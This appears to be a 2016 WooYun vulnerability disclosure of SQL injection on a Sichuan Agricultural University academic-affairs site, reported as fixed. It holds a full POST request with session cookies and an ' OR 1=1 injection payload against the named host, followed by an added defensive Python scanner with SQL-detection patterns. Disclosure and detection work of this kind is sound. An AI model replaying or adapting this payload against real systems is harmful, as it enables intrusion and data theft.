
Vulnerability summary (followers: 24)

Defect ID: wooyun-2016-0177414

Title: SQL injection vulnerability on a Sichuan Agricultural University site

Vendor: Sichuan Agricultural University (四川农业大学)

Author: 路人甲

Submitted: 2016-02-22 11:00

Fixed: 2016-03-04 15:56

Published: 2016-03-04 15:56

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 15

Status: Fixed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]

Tags:


Vulnerability details

Disclosure status:

2016-02-22: Details sent to the vendor; awaiting vendor action
2016-02-23: Vendor confirmed; details disclosed to the vendor only
2016-03-04: Details disclosed to core white-hat researchers and domain experts
2016-03-04: Vendor fixed the vulnerability and chose to publish; details disclosed to the public

Brief description:

Detailed description:

POST /web/web/lanmu/tklist.asp HTTP/1.1
Content-Length: 737
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://jiaowu.sicau.edu.cn
Cookie: ASPSESSIONIDSSATDARA=FFMAGDODGBDNCMDHLBFIAFCK; senfen=; jcrj%5Fxueqi=2015%2D2016%2D1; jcrj%5Fid=1581933856; jcrj%5Fuser=web; jcrj%5Fpwd=web; jcrj%5Fauth=True; jcrj%5Fsession=jwc%5Fcheck%2Cauth%2Cid%2Cxueqi%2Ctymfg%2Csf%2Cjwc%5Fcheck%2Cuser%2Cpwd%2Cbaoid%2Cjs%5Fjc%2Cjs%5Frq%2Cbianhao%2Cjihuanianji%2C; jcrj%5Fjwc%5Fcheck=y; jcrj%5Fsf=%D1%A7%C9%FA; jcrj%5Ftymfg=%C0%B6%C9%AB%BA%A3%CC%B2; jcrj%5Fbaoid=3642694354; jcrj%5Fjs%5Frq=1; jcrj%5Fjs%5Fjc=2; jcrj%5Fjihuanianji=2011; jcrj%5Fbianhao=%B9%A4%B3%CC%B9%DC%C0%ED2011
Host: jiaowu.sicau.edu.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
bh=8996328181347053886467058199759489961391&h=%b5%f7%cd%a3%bf%ce%b2%e9%d1%af&id=0&jsj=&kl=&ku=&m=&o=id%20desc&p=100&picha=yes&rig=%ce%de&rul=%ce%c4%2c%ce%c4%2c%ce%c4%2c%ce%c4%2c%ce%c4%2c%ce%c4%2c%ce%c4%2c%ce%c4%2c%ce%c4%2c%ce%c4%2c%ce%c4%2c%ce%c4%2c%ce%c4%2c%ce%c4%2c%ce%c4%2cs%ca%c7%b7%f1%2c%ce%c4%2c%ce%c4%2c%ce%c4%2c%ce%c4&sel1w=-1' OR 1=1* or 'x7uQ4H2x'=' &sel2w=%c8%ab%b2%bf&selw=%c8%ab%b2%bf&sw1=&twid=1000&vrul=y%2cy%2cy%2cy%2cy%2cy%2cy%2cy%2cy%2cy%2cy%2cy%2cy%2cy%2cy%2cy%2cy%2cy%2cy%2cy&w1=%d1%a7%c6%da%3d'2015-2016-1'%20and%20%ca%c7%b7%f1%c9%f3%ba%cb%3d'%ca%c7'&w2=&wid=50%2c50%2c50%2c80%2c50%2c50%2c50%2c50%2c50%2c50%2c50%2c50%2c50%2c50%2c50%2c50%2c50%2c50%2c50%2c50&ww=1&xuangai=&y=1&zh=

[Screenshot: 7.png]
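The request above is the whole of the report, so here is the check a defender would run over it. This is an added example, not code from the report or from the affected site: a small scanner that percent-decodes a URL-encoded POST body and flags every parameter whose value carries SQL syntax. Run on the body shown above (embedded verbatim; GBK is assumed as the site charset from the %xx byte pairs and the ASP stack), it flags sel1w, whose value breaks out of a quoted string with ' OR 1=1, and also w1 and o, because as sent they already hold SQL-shaped fragments (a quoted WHERE condition and an "id desc" sort expression) rather than plain data. That second class of finding is what a log-review or WAF rule should surface: an endpoint that accepts SQL fragments from the client is the underlying design weakness, not just the one parameter the tester chose.

```python
"""Flag SQL syntax inside URL-encoded form parameters (added example)."""
import re
from urllib.parse import parse_qs

# POST body from the report above (tklist.asp), embedded verbatim so the
# example runs offline. Split only for readability; the content is unchanged.
BODY = (
    "bh=8996328181347053886467058199759489961391"
    "&h=%b5%f7%cd%a3%bf%ce%b2%e9%d1%af&id=0&jsj=&kl=&ku=&m=&o=id%20desc"
    "&p=100&picha=yes&rig=%ce%de"
    "&rul=%ce%c4%2c%ce%c4%2c%ce%c4%2c%ce%c4%2c%ce%c4%2c%ce%c4%2c%ce%c4%2c%ce%c4"
    "%2c%ce%c4%2c%ce%c4%2c%ce%c4%2c%ce%c4%2c%ce%c4%2c%ce%c4%2c%ce%c4%2cs%ca%c7%b7%f1"
    "%2c%ce%c4%2c%ce%c4%2c%ce%c4%2c%ce%c4"
    "&sel1w=-1' OR 1=1* or 'x7uQ4H2x'=' "
    "&sel2w=%c8%ab%b2%bf&selw=%c8%ab%b2%bf&sw1=&twid=1000"
    "&vrul=y%2cy%2cy%2cy%2c" "y%2cy%2cy%2cy%2c" "y%2cy%2cy%2cy%2c"
    "y%2cy%2cy%2cy%2c" "y%2cy%2cy%2cy"
    "&w1=%d1%a7%c6%da%3d'2015-2016-1'%20and%20%ca%c7%b7%f1%c9%f3%ba%cb%3d'%ca%c7'"
    "&w2=&wid=50%2c50%2c50%2c80" "%2c50%2c50%2c50%2c50" "%2c50%2c50%2c50%2c50"
    "%2c50%2c50%2c50%2c50" "%2c50%2c50%2c50%2c50"
    "&ww=1&xuangai=&y=1&zh="
)

# Signals that mark a form value as SQL syntax rather than data. Kept few and
# specific so the output is reviewable instead of noisy.
SIGNALS = {
    # closing quote immediately followed by a boolean operator: the classic
    # break-out from a string literal (sel1w above: -1' OR 1=1 ...)
    "quote_then_boolean": re.compile(r"'\s*(?:or|and)\b", re.I),
    # numeric tautology such as OR 1=1
    "tautology": re.compile(r"\b(?:or|and)\s+\d+\s*=\s*\d+", re.I),
    # SQL comment opener or statement terminator
    "comment_or_terminator": re.compile(r"--|/\*|;"),
    # a bare "column asc|desc" value: an ORDER BY fragment supplied by the client
    "order_by_fragment": re.compile(r"^\s*[\w.]+\s+(?:asc|desc)\s*$", re.I),
}


def scan_body(body: str, encoding: str = "gbk") -> dict[str, list[str]]:
    """Return {parameter: [signal names]} for every parameter that trips a signal.

    The body is percent-decoded and then decoded with the site's charset
    (GBK assumed here) so the patterns see the same text the server-side
    script would. Undecodable bytes are replaced rather than raising.
    """
    params = parse_qs(body, keep_blank_values=True, encoding=encoding, errors="replace")
    findings: dict[str, list[str]] = {}
    for name, values in params.items():
        hits = sorted({sig for value in values for sig, rx in SIGNALS.items() if rx.search(value)})
        if hits:
            findings[name] = hits
    return findings


if __name__ == "__main__":
    # Prints one line per flagged parameter, in request order.
    for param, hits in scan_body(BODY).items():
        print(f"{param}: {', '.join(hits)}")
```

The GBK decode matters: with the default UTF-8 the Chinese values become replacement characters, which is harmless for these patterns but would hide any injection written in the site's own charset. In a real deployment the same function would be fed each request body from an access log or reverse-proxy capture, with the parameter names that trip `order_by_fragment` or `quote_then_boolean` on normal traffic treated as the list of endpoints to refactor onto parameterised queries.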

Proof of vulnerability:

Remediation:

Copyright notice: when reposting, credit the source: 路人甲@乌云


Responses

Vendor response:

Severity: Medium

Vulnerability rank: 8

Confirmed: 2016-02-23 10:49

Vendor reply:

The relevant unit has been notified and is handling it.

Latest status:

2016-03-04: Fixed